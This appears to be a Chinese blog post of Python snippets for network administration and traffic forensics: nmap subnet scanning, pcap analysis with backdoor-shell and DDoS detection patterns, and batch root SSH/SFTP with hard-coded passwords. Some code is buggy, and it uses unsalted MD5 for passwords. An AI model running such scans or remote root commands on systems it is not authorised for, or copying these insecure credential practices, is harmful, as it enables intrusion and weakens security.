作者编写的一些代码片段,本版本为残废删减版,没有加入多线程,也没有实现任何有价值的功能,只是一个临时记事本,记录下本人编写代码的一些思路,有价值的完整版就不发出来了,自己组织吧,代码没啥技术含量,毕竟Python这一块没怎么认真研究过,代码也都是随性瞎写的,大佬不要喷我,将就着看吧。
本人使用Python的感受: python 使用起来简单,一些问题使用Python来解决会比其他语言更容易实现,而且Python提供了丰富的第三方库,开发效率非常高,由此会让人产生无所不能的错觉,这种错觉非常可怕(容易让人骄傲自满),Python是为大牛节约开发时间准备的,在大牛手里将是一把利器,在初学者手里会很容易让人"满足",初学者应该避免使用Python编程,他会隐藏代码实现的各种细节,从而让你无法了解本质的东西,毕竟使用Python写代码,写的再好终究也是脚本而已。如果你是一名喜欢刨根问底的人,那么C/C++是不错的选择,使用它会让你受益匪浅。
关于原因: 试想一下 Python 第三方库不更新或者无法使用了,你该怎么办?难道只能放弃编程吗?重复造轮子的意义不在于造出来要去使用它,而在于你懂原理,可以在极端情况下也能将问题完美的解决(这才是真正的程序员),之所以你觉得Python简单是因为你站在了巨人的肩膀上,如果巨人不肯给你肩膀搭,那么你可能连最基本的功能都做不到,这种处境最让人绝望,虽然C++更复杂,但使用它会让人更踏实。
最终总结: 然而这些代码仅仅只是我的错觉,很多库的实现原理都不太了解,仍然是个菜鸟,只会搭积木的脚本小子,此时此刻想继续使用C/C++彻底放弃Python,有太多细节被隐藏,不利于学习进步,当然,任何一门语言在实现同一件事的时候虽然过程不太一样但结果都是一样的,语言也仅仅只是工具,是思维的外衣,而程序则是思维的副产品,没有好坏之分,只有合不合适,陈不称心,能不能学到更多,而相应的Python就像一个本分女子没有暴露太多,而C/C++ 更像是风骚的少妇,你可以窥探它所有的秘密,学到更多开车的知识与技术,当再次使用Python的时候,你就可以坦然面对,大胆尝试,因为你心里有谱,孰轻孰重,自在掌握之中。
废话不啰嗦,开始上代码,第一种是无参数的简单实现方式.
import sys
if len(sys.argv) < 2:
print ("没有输入任何参数")
sys.exit()
if sys.argv[1].startswith("-"):
option = sys.argv[1][1:]
if option == "version":
print ("版本信息")
elif option == "help":
print ("帮助菜单")
else:
print ("异常")
sys.exit()
我们还可以编写一个交互式的Shell环境,这样能更加灵活的操作命令,操作方式 [shell] # ls
# coding:utf-8
import os
def add(x, y):
print("两数相连",x + y)
def clear():
os.system("cls")
def main():
while True:
try:
cmd = str(input("[Shell] # ")).split()
cmd_len = len(cmd)
if (cmd == ""):
continue
elif (cmd[0] == "exit"):
exit(1)
elif (cmd[0] == "clear"):
clear()
elif (cmd[0] == "add"):
if(cmd_len-1 >= 2):
temp1 = cmd[1]
temp2 = cmd[2]
add(temp1,temp2)
else:
print("add 参数不正确,至少传递2个参数")
else:
print("没有找到这个命令")
except Exception:
continue
if __name__ == '__main__':
main()
也可以使用内置库实现交互命令,do_xxxx()
import os
import sys
from cmd import Cmd
class BingCmd(Cmd):
prompt = "[Shell] #"
def preloop(self):
print("hello world")
def do_bing(self, argv):
print("参数传递: {}".format(argv))
prompt = "bing >"
def help_bing(self):
print("bing 函数的帮助信息")
def emptyline(self):
print("当输入空行时调用该方法")
def default(self,line):
print("无法识别输入的command时调用该方法")
def do_exit(self):
sys.exit()
if __name__ == "__main__":
BingCmd().cmdloop()
如果需要编写一些相对大型的项目,则需要使用类来开发,以下代码用类实现的命令行传递.
'''http://patorjk.com/software/taag'''
#coding:utf-8
import optparse
class MyClass:
def __init__(self):
usage = ''' 123'''
parser = optparse.OptionParser(usage=usage)
parser.add_option("-s", "--server", type="string" , dest="server", help="you server IP")
parser.add_option("-p", "--port", type="int", dest="port", help="you server port")
self.options, self.args = parser.parse_args()
parser.print_help()
def check(self):
if not self.options.server or not self.options.port:
exit()
def fuck(self,ip,port):
try:
print("接收到参数列表,准备执行功能!")
for i in range(0,100):
print(ip,port)
except:
print("[ - ] Not Generate !")
if __name__ == '__main__':
opt = MyClass()
opt.check()
ip = opt.options.server
port = opt.options.port
if ip != "None" and port != "None":
opt.fuck(ip,port)
构造一个数据包
from scapy.all import Ether
from scapy.all import ARP
from scapy.all import srp
ether = Ether(src="00:00:00:00:00:00",dst="FF:FF:FF:FF:FF:FF")
arp = ARP(op=1,hwsrc="00:00:00:00:00:00",hwdst="FF:FF:FF:FF:FF:FF",psrc="192.168.1.2",pdst="255.255.255.255")
send = ether/arp
res = srp(send,timeout=3,verbose=0)
nmap 提取关键数据
import numpy as np
from pylab import *
import nmap
n=nmap.PortScanner()
ret = n.scan(hosts="192.168.1.0/24",arguments="-O")
#print(n["192.168.1.20"]['addresses']['ipv4'])
print(ret)
ret["nmap"]["command_line"]
"nmap -O 192.168.1.20"
>>> ret["nmap"]["scanstats"]["timestr"]
'Thu Mar 19 19:20:08 2020'
>>> ret["nmap"]["scanstats"]["uphosts"]
'4'
>>> ret["nmap"]["scanstats"]["totalhosts"]
'256'
>>> n.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.20"]["addresses"]
{'ipv4': '192.168.1.20', 'mac': '00:50:56:22:6F:D3'}
>>> ret["scan"]["192.168.1.20"]["addresses"]["ipv4"]
'192.168.1.20'
>>> ret["scan"]["192.168.1.20"]["addresses"]["mac"]
'00:50:56:22:6F:D3'
>>> ret["scan"]["192.168.1.20"]["tcp"].keys()
dict_keys([21, 22, 80, 139, 445, 3306])
>>> ret["scan"]["192.168.1.20"]["osmatch"][0]["name"]
'Linux 3.2 - 4.9'
>>> ret["scan"]["192.168.1.10"]["vendor"].values()[0]
'Elitegroup Computer System CO.'
def aaa():
mpl.rcParams['font.sans-serif'] = ['KaiTi']
label = "windows xp","windows 7","Windows 8","Linux 4","Centos 6","Huawei交换机"
fracs = [1,2,3,4,5,1]
plt.axes(aspect=1)
plt.pie(x=fracs,labels=label,autopct="%0d%%")
plt.show()
nmap 搞事情,统计结果
import os,sys
number = [80,8080,3306,3389,1433,1433,1433]
flag = {}
list_num = set(number)
for item in list_num:
num = str(number.count(item))
flag[item]=num
print(flag)
--------------------------------------------------------------------------
>>> Nmap.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.1"]["tcp"].keys()
dict_keys([80, 1900])
>>> for item in Nmap.all_hosts():
... ret["scan"][item]["tcp"].keys()
...
dict_keys([80, 1900])
dict_keys([100, 135, 139, 443, 902, 912, 1433, 2869, 3389])
dict_keys([135, 139, 445, 5357])
a = dict_keys([21, 22, 80, 139, 445, 3306])
list(a)
--------------------------------------------------------------------------
import os
import nmap
def ScanPort():
port =[]
flag = {}
dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
Nmap = nmap.PortScanner()
ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
for item in Nmap.all_hosts():
temp = list(ret["scan"][item]["tcp"].keys())
port.extend(temp)
list_num = set(port)
for item in list_num:
num = int(port.count(item))
flag[item] = num
dic["WebServer"] = flag.get(80)
dic["MySQL"] = flag.get(3306)
dic["SSH"] = flag.get(22)
dic["MSSQL"] = flag.get(1433)
print(dic)
ScanPort()
C:UsersLySharkDesktop>python main.py
{55555, 3, 902, 135, 139, 9102, 912, 21, 22, 1433, 1062, 425, 2601, 14000, 55600, 2869, 443, 3389, 445, 3905, 1352, 8654, 80, 82, 212, 100, 616, 3306, 1900, 5357}
{'WebServer': 3, 'MySQL': 1, 'SSH': 1, 'MSSQL': 0}
nmap 看图识字,频繁扫描会出现崩溃的情况,解决办法是异常处理。
import os,nmap
import numpy as np
from matplotlib.pylab import *
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
def ScanPort():
port =[]
flag = {}
dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
Nmap = nmap.PortScanner()
ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
for item in Nmap.all_hosts():
temp = list(ret["scan"][item]["tcp"].keys())
port.extend(temp)
list_num = set(port)
for item in list_num:
num = int(port.count(item))
flag[item] = num
dic["WebServer"] = flag.get(80)
dic["MySQL"] = flag.get(3306)
dic["SSH"] = flag.get(22)
dic["MSSQL"] = flag.get(1433)
print(dic)
mpl.rcParams['font.sans-serif'] = ['KaiTi']
label = list(dic.keys())
fracs = list(dic.values())
plt.axes(aspect=1)
plt.pie(x=fracs,labels=label,autopct="%0d%%")
plt.savefig('port.png')
ScanPort()
dpkt 流量解包: 流量解包
import dpkt
import socket
import geoip2.database
import argparse
p=dpkt.ethernet.Ethernet(data)
if p.data.__class__.__name__=="IP":
if p.data.data.__class__.__name__=="TCP":
if p.data.data.dport== 80 and data.data.dport == 443:
data=p.data.data.data
if b'www.com' in data:
recv=re.findall(b'[1-9][0-9]{4,}',data)
if len(recv):
print('{}'.format(bytes.decode(recv[0]).replace('o_cookie=','')))
def GetPcap(pcap):
ret = []
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
# print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst))
ret.append(dst)
except:
pass
return set(ret)
公开一个定位工具 这里只公开一个基础班的地址查询工具,完整版不变公开。
import dpkt
import socket
import geoip2.database
import argparse
def GetPcap(pcap):
ret = []
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
# print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst))
ret.append(dst)
except:
pass
return set(ret)
def retKML(addr,longitude,latitude):
kml = (
'<Placemark>
'
'<name>%s</name>
'
'<Point>
'
'<coordinates>%6f,%6f</coordinates>
'
'</Point>
'
'</Placemark>
'
) %(addr, longitude, latitude)
return kml
if __name__ == '__main__':
# 使用方式: main.py -p data.pcap -d GeoLite2-City.mmdb (分析数据包中IP)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--pcap", dest="pcap_file", help="set -p *.pcap")
parser.add_argument("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb")
args = parser.parse_args()
if args.pcap_file and args.mmdb_file:
fp = open(args.pcap_file,'rb')
pcap = dpkt.pcap.Reader(fp)
addr = GetPcap(pcap)
reader = geoip2.database.Reader(args.mmdb_file)
kmlheader = '<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
'
with open("GoogleEarth.kml", "w") as f:
f.write(kmlheader)
f.close()
for item in addr:
try:
response = reader.city(item)
print("IP地址: %-16s --> " %item,end="")
print("网段: %-16s --> " %response.traits.network,end="")
print("地区: {}".format(response.country.names["zh-CN"]),end="
")
with open("GoogleEarth.kml","a+") as f:
f.write(retKML(item,response.location.latitude, response.location.longitude))
f.close()
except Exception:
pass
kmlfooter = '</Document>
</kml>
'
with open("GoogleEarth.kml", "a+") as f:
f.write(kmlfooter)
f.close()
else:
parser.print_help()
默认会生成谷歌文本,你可以将其倒入谷歌地球
检测URL中的敏感路径 FindPcapWord可用于检测URL中是否存在敏感字
def FindPcapWord(pcap,WordKey):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
http = dpkt.http.Request(tcp.data)
if(http.method == "GET"):
uri = http.uri.lower()
if WordKey in uri:
print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri))
except Exception:
pass
FindHivemind 检测数据包中是否存在敏感字符
def FindHivemind(pcap):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
dport = tcp.dport
# print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport))
if dport == 80 and dst == "125.39.247.226":
# 如果数据流中存在cmd等明文命令则说明可能存在后门
if '[cmd]# ' in tcp.data.lower():
print("[+] {}:{}".format(dst,dport))
except Exception:
pass
dpkt 检测网络流量合法性: 通常配合WireShark抓取网络数据包,然后配合dpkt解包工具对流量进行分析,常用于网络取证.
# FindPcapWord可用于检测URL中是否存在敏感字
def FindPcapWord(pcap,WordKey):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
http = dpkt.http.Request(tcp.data)
if(http.method == "GET"):
uri = http.uri.lower()
if WordKey in uri:
print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri))
except Exception:
pass
# FindHivemind 检测数据包中是否存在敏感字符
def FindHivemind(pcap):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
dport = tcp.dport
# print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport))
if dport == 80 and dst == "125.39.247.226":
# 如果数据流中存在cmd等明文命令则说明可能存在后门
if '[cmd]# ' in tcp.data.lower():
print("[+] {}:{}".format(dst,dport))
except Exception:
pass
# 检测主机是否被DDOS攻击了.
def FindDDosAttack(pcap):
pktCount = {}
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
# 累计判断各个src地址对目标地址80端口访问次数
if dport == 80:
stream = src + ":" + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except Exception:
pass
for stream in pktCount:
pktSent = pktCount[stream]
# 如果超过设置的检测阈值500,则判断为DDOS攻击行为
if pktSent > 500:
src = stream.split(":")[0]
dst = stream.split(":")[1]
print("[+] 源地址: {} 攻击: {} 流量: {} pkts.".format(src,dst,str(pktSent)))
if __name__ == "__main__":
fp = open("D://data.pcap","rb")
pcap = dpkt.pcap.Reader(fp)
FindPcapWord(pcap,"wang.zip")
简单实现批量执行SSH命令:
import os,paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def BatchCMD(address,username,password,port,command):
try:
ssh.connect(hostname=address,username=username,password=password,port=port,timeout=2)
stdin , stdout , stderr = ssh.exec_command(command)
result = stdout.read()
if len(result) != 0:
print(' 33[0mIP: {} UserName:{} Port: {} Status: OK'.format(address,username,port))
return 1
else:
print(' 33[45mIP: {} UserName:{} Port: {} Status: Error'.format(address,username,port))
return 0
except Exception:
print(' 33[45mIP: {} UserName:{} Port: {} Status: Error'.format(address, username, port))
return 0
if __name__ == "__main__":
fp = open("ip.log","r+")
for temp in fp.readlines():
ip = temp.split("
")[0]
BatchCMD(ip, "root", "1233", "22", "ls && echo $?")
简单实现批量SFTP远程传输:
import paramiko
def BatchSFTP(address,username,password,port,soruce,target,flag):
transport = paramiko.Transport((address, int(port)))
transport.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(transport)
if flag == "PUT":
try:
ret = sftp.put(soruce, target)
if ret !="":
print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address,username,soruce,target))
return 1
else:
print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address, username, soruce, target))
return 0
transport.close()
except Exception:
return 0
transport.close()
elif flag == "GET":
try:
target = str(target + "_" + address)
ret = sftp.get(soruce, target)
if ret != "":
print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address, username, soruce, target))
return 1
else:
print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address, username, soruce, target))
return 0
transport.close()
except Exception:
return 0
if __name__ == "__main__":
# 将本地文件./main.py上传到/tmp/main.py
BatchSFTP("192.168.1.20","root","1233","22","./main.py","/tmp/main.py","PUT")
# 将目标主机下的/tmp/main.py拷贝到本地文件./get/test.py
BatchSFTP("192.168.1.20","root","1233","22","/tmp/main.py","./get/test.py","GET")
通过SSH模块获取系统内存数据 这里我写了一个简单的获取内存数据的脚本,当然获取CPU磁盘等,同样可以这样来搞.
import os,paramiko,re
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def SSH_Get_Mem():
dict ={}
list = []
head =["MemTotal","MemFree","Cached","SwapTotal","SwapFree"]
ssh.connect(hostname="192.168.1.20", username="root", password="1233", port=22, timeout=2)
stdin, stdout, stderr = ssh.exec_command('cat /proc/meminfo')
string = str(stdout.read())
for i in [0,1,4,14,15]: # 取出列表中的这几行
Total = string.split("\n")[i].split(":")[1].replace(" kB","").strip()
list.append(Total)
for (head,list) in zip(head,list):
dict[head]=int(list); # 组合成一个字典
return dict
if __name__ == "__main__":
for i in range(10):
dic = SSH_Get_Mem()
print(dic)
fabric的使用技巧 fabric工具也是自动化运维利器,其默认依赖于paramiko的二次封装.
# 简单实现命令执行
from fabric import Connection
conn = Connection(host="192.168.1.10",user="root",port="22",connect_kwargs={"password":"123"})
try:
with conn.cd("/var/www/html/"):
ret = conn.run("ls -lh",hide=True)
print("主机:" + conn.host + "端口:" + conn.port + "完成")
except Exception:
print("主机:" + conn.host + "端口:" + conn.port + "失败")
# 读取数据到本地
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port="22",connect_kwargs={"password":"123"})
uname = conn.run('uname -s', hide=True)
if 'Linux' in uname.stdout:
command = "df -h / | tail -n1 | awk '{print $5}'"
print(conn.run(command,hide=True).stdout.strip())
# 文件上传与下载
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port="22",connect_kwargs={"password":"123"})
conn.put("D://zabbix_get.exe","/tmp/zabbix.exe") # 文件上传
conn.get("/tmp/zabbix.exe","./zab.exe") # 下载文件
通过SNMP收集主机CPU利用率 通过SNMP协议,收集目标主机的CPU利用率(百分比),并返回JSON字符串.
import os,re,time
def Get_CPU_Info(addr):
try:
Head = ["HostName","CoreLoad","CpuUser","CpuSystem","CpuIdle"]
CPU = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
CPU.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.25.3.3.1.2")
CPU.append(ret.read().split(":")[3].strip())
for i in [9,10,11]:
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " 1.3.6.1.4.1.2021.11.{}.0".format(i))
ret = ret.read()
Info = ret.split(":")[3].strip()
CPU.append(Info)
return dict(zip(Head,CPU))
except Exception:
return 0
if __name__ == '__main__':
for i in range(100):
dic = Get_CPU_Info("192.168.1.20")
print(dic)
time.sleep(1)
通过SNMP获取系统CPU负载信息 分别获取到系统的1,5,15分钟的负载信息,并返回JSON格式.
import os,re,time
def Get_Load_Info(addr):
try:
Head = ["HostName","Load1","Load5","Load15"]
SysLoad = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
SysLoad.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.10.1.3")
load = list(re.sub(".*STRING: ", "", ret.read()).split("
"))
SysLoad.append(load[0])
SysLoad.append(load[1])
SysLoad.append(load[2])
return dict(zip(Head,SysLoad))
except Exception:
return 0
if __name__ == '__main__':
dic = Get_Load_Info("192.168.1.20")
print(dic)
通过SNMP获取系统内存占用
import os,re,time
def Get_Mem_Info(addr):
try:
Head = ["HostName","memTotalSwap","memAvailSwap","memTotalReal","memTotalFree"]
SysMem = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
SysMem.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.4")
mem = ret.read().split("
")
for i in [2,3,4,6]:
SysMem.append(re.sub(".*INTEGER: ","",mem[i]).split(" ")[0])
return dict(zip(Head,SysMem))
except Exception:
return 0
if __name__ == '__main__':
dic = Get_Mem_Info("192.168.1.20")
print(dic)
通过SNMP获取系统磁盘数据 这个案例并不完整,我只写了一点,后面有个问题一直没有解决.
import os,re,time
def Get_Disk_Info(addr):
try:
dic = {}
list = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageDescr")
DiskName = ret.read().split("
")
ret =os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageUsed")
DiskUsed = ret.read().split("
")
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageSize")
DiskSize = ret.read().split("
")
for i in range(1,len(DiskName) - 7):
dic["Name"]= DiskName[i + 5].split(":")[3]
dic["Used"]= DiskUsed[i + 5].split(":")[3]
dic["Size"]= DiskSize[i + 5].split(":")[3]
list.append(dic)
return list
except Exception:
return 0
if __name__ == '__main__':
list = Get_Disk_Info("192.168.1.20")
print(list)
将指定的日志格式写入文件
import os,re,time
def WriteFileLog(filename,log):
if os.path.exists(filename):
fp =open(filename,"a+")
fp.write(log+"
")
else:
fp =open(filename,"w+")
fp.close()
if __name__ == "__main__":
dic = {"admin":"123123"}
WriteFileLog("test.log",str(dic))
计算指定范围时间戳 通过编程实现计算出指定时间之内对应时间戳数据,用于通过时间戳定位时间区间.
import os
import sys
import time,datetime
# start = 2019-12-10 14:49:00
# end = 2019-12-10 14:50:00
def ReadLog(log,start,ends):
find_list = []
start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
while start_time <= end_time:
find_list.append(start_time)
start_time=start_time+1
print(find_list)
ReadLog("./cpu.log","2019-12-10 14:49:00","2019-12-10 14:50:00")
通过DNSpython模块查询域名记录
# pip install dnspython
import os
import dns.resolver
domain = "baidu.com"
A = dns.resolver.query(domain,"A")
for x in A.response.answer:
for y in x.items:
print("查询到A记录:{} ".format(y))
print("*"*50)
MX = dns.resolver.query(domain,"MX")
for x in MX:
print("MX交换数值 {} MX记录:{} ".format(x.preference,x.exchange))
print("*"*50)
NS = dns.resolver.query(domain,"NS")
for x in NS.response.answer:
for y in x.items:
print("NS名称服务:{} ".format(y.to_text()))
实现两个文件Diff差异比对 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html报表.
import os
import difflib
def ReadFile(filename):
try:
fp = open(filename,"r")
text = fp.read().splitlines()
fp.close()
return text
except IOError as error:
print("读取文件出错了.{}".format(str(error)))
def DiffFile(file1,file2):
text1 = ReadFile(file1)
text2 = ReadFile(file2)
diff = difflib.HtmlDiff()
html = diff.make_file(text1,text2)
fp = open("./diff.html","w")
fp.write(html)
DiffFile("C://old.txt","C://new.txt")
手工实现遍历目录下文件 通过手动编程实现对指定目录中文件的遍历.
import os
def list_all_files(rootdir):
_files = []
list = os.listdir(rootdir)
for i in range(0,len(list)):
path = os.path.join(rootdir,list[i])
if os.path.isdir(path):
_files.extend(list_all_files(path))
if os.path.isfile(path):
_files.append(path)
return _files
list = list_all_files("D:/sqlite")
print(list)
通过简单拼接实现遍历文件 此处也可以使用一个简单的方法实现遍历文件与目录.
import os
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
for name in files:
print(os.path.join(root, name))
for name in dirs:
print(os.path.join(root, name))
import os
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
for name in dirs:
print(os.path.join(root, name))
import os
for root,dirs,files in os.walk(os.getcwd()):
for file in files:
print(os.path.join(root,file))
拼接文件路径遍历指定类型的文件
import os
def spider(script_path,script_type):
final_files = []
for root, dirs, files in os.walk(script_path, topdown=False):
for fi in files:
dfile = os.path.join(root, fi)
if dfile.endswith(script_type):
final_files.append(dfile.replace("\","/"))
print("[+] 共找到了 {} 个PHP文件".format(len(final_files)))
return final_files
PagePath = spider("D://phpstudy/WWW/xhcms","php")
print(PagePath)
简单实现钉钉报警
import requests
import sys
import json
dingding_url = 'https://oapi.dingtalk.com/robot/send?access_token=6d11af32'
data = {"msgtype": "markdown","markdown": {"title": "监控","text": "apche异常"}}
headers = {'Content-Type':'application/json;charset=UTF-8'}
send_data = json.dumps(data).encode('utf-8')
requests.post(url=dingding_url,data=send_data,headers=headers)
生成随机验证码
import sys
import random
rand=[]
for x in range(6):
y=random.randrange(0,5)
if y == 2 or y == 4:
num=random.randrange(0,9)
rand.append(str(num))
else:
temp=random.randrange(65,91)
c=chr(temp)
rand.append(c)
result="".join(rand)
print(result)
生成XLS报表
import os
import xlwt
import time
def XLSWrite():
workbook = xlwt.Workbook(encoding="utf-8")
sheet =workbook.add_sheet("这里是主标题")
sheet.write(0,0,"编号")
sheet.write(0,1,"内容")
for i in range(0,10):
sheet.write(i+1,0,i)
sheet.write(i+1,1,i)
times = time.time()
workbook.save("{}.xls".format(times))
if os.path.exists("{}.xls".format(times)):
print("保存完成")
if __name__ == "__main__":
XLSWrite()
psutil取系统相关数据
import psutil
cpu = psutil.cpu_times()
print("用户时间比:{}".format(cpu.user))
print("CPU空闲百分比:{}".format(cpu.idle))
print("CPU逻辑个数:{}".format(psutil.cpu_count()))
print("CPU物理个数:{}".format(psutil.cpu_count(logical=True)))
print("-"*50)
mem = psutil.virtual_memory()
print("系统总内存:{}".format(mem.total))
print("已使用内存:{}".format(mem.used))
print("空闲的内存:{}".format(mem.free))
print("交换内存已使用:{}".format(psutil.swap_memory().used))
print("-"*50)
print("全部分区数据:{}".format(psutil.disk_partitions()))
print("指定挂载点/数据:{}".format(psutil.disk_usage("/")))
print("磁盘总IO数:{}".format(psutil.disk_io_counters()))
print("取单个分区IO个数:{}".format(psutil.disk_io_counters(perdisk=True)))
print("-"*50)
print("获取网络IO信息:{}".format(psutil.net_io_counters()))
print("输出每个网络接口的IO信息:{}".format(psutil.net_io_counters(pernic=True)))
print("-"*50)
print("系统进程列表:{}".format(psutil.pids()))
process = psutil.Process(0) # 实例化0号进程
print("进程名称:{}".format(process.name()))
print("进程线程数:{}".format(process.num_threads()))
print("进程工作状态:{}".format(process.status()))
# print("进程UID:{} GID:{}".format(process.uids,process.gids))
print("取进程利用率:{}".format(process.memory_percent()))
print("进程Socket:{}".format(process.connections()))
实现简单HTTP服务 对于Web应用,本质上就是socket服务端,用户的浏览器其实就是socket客户端,其下面就是简单实现的HTTP服务器.
import socket
def handle_request(client):
buf = client.recv(1024)
client.send(bytes("HTTP/1.1 200 OK
","UTF-8"))
client.send(bytes("<b>Hello lyshark</b>","UTF-8"))
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("localhost",80))
sock.listen(5)
while True:
connection, address = sock.accept()
handle_request(connection)
connection.close()
if __name__ == "__main__":
main()
简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123
import os,time
import hashlib
db = [
{"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"}
]
def CheckUser(username,password):
hash = hashlib.md5()
for i in range(0,len(db)):
if db[i].get("user") == username:
if db[i].get("Flag") < "5":
hash.update(bytes(password,encoding="utf-8"))
if db[i].get("pass") == str(hash.hexdigest()):
db[i]['Flag'] = 0
return 1
else:
db[i]['Flag'] = str(int(db[i]['Flag']) + 1)
return 0
else:
print("用户 {} 被永久限制登录".format(db[i].get("user")))
return 0
return 0
while(True):
username = input("输入用户名: ")
password = input("输入密码: ")
ret= CheckUser(username,password)
print("登录状态:",ret)
针对Web服务的流量统计: 统计Web服务器日志文件中的流量计数,例如192.168.1.10总访问流量.
import os,sys
def Count_IP_And_Flow(file):
addr = {} # key 保存当前的IP信息
flow = {} # value 保存当前IP流量总和
Count= 0 # 针对IP地址的计数器
with open(file) as f:
contexts = f.readlines()
for line in contexts:
if line.split()[9] != "-" and line.split()[9] != '"-"':
size = line.split()[9]
ip_attr = line.split()[0]
Count = int(size) + Count
if ip_attr in addr.keys():
addr[ip_attr] = addr[ip_attr] + 1
flow[ip_attr] = flow[ip_attr] + int(size)
else:
addr[ip_attr] = 1
flow[ip_attr] = int(size)
return addr,flow
if __name__ == "__main__":
Address,OutFlow = Count_IP_And_Flow("c://access.log")
print("地址计数:{} ---> 流量计数:{}".format(Address,OutFlow))
针对Web服务的状态码统计: 统计Web服务日志中的状态码的统计,例如404出现的频率等.
import os,sys
def Count_Flag_And_Flow(file):
list = []
flag = {}
with open(file) as f:
contexts = f.readlines()
for line in contexts:
it = line.split()[8]
list.append(it)
list_num = set(list)
for item in list_num:
num = list.count(item)
print("状态码:{} --> 计数:{}".format(item,num))
flag[item] = num
return flag
if __name__ == "__main__":
Address = Count_Flag_And_Flow("c://access.log")
print("地址计数:{} ".format(Address))
计算出指定网段主机IP:
import os
def CalculationIP(Addr_Count):
ret = []
try:
IP_Start = str(Addr_Count.split("-")[0]).split(".")
IP_Heads = str(IP_Start[0] + "." + IP_Start[1] + "." + IP_Start[2] +".")
IP_Start_Range = int(Addr_Count.split(".")[3].split("-")[0])
IP_End_Range = int(Addr_Count.split("-")[1])
for item in range(IP_Start_Range,IP_End_Range+1):
ret.append(IP_Heads+str(item))
return ret
except Exception:
return 0
if __name__ == "__main__":
ret = CalculationIP("192.168.1.10-200")
for item in range(len(ret)):
print("地址范围内的所有IP: {}".format(ret[item]))
PHP函数扫描工具: 快速扫描PHP文件中的危险函数,可用于挖掘漏洞与一句话扫描.
# coding=gbk
import sys,os,re
def spider(script_path,script_type):
final_files = []
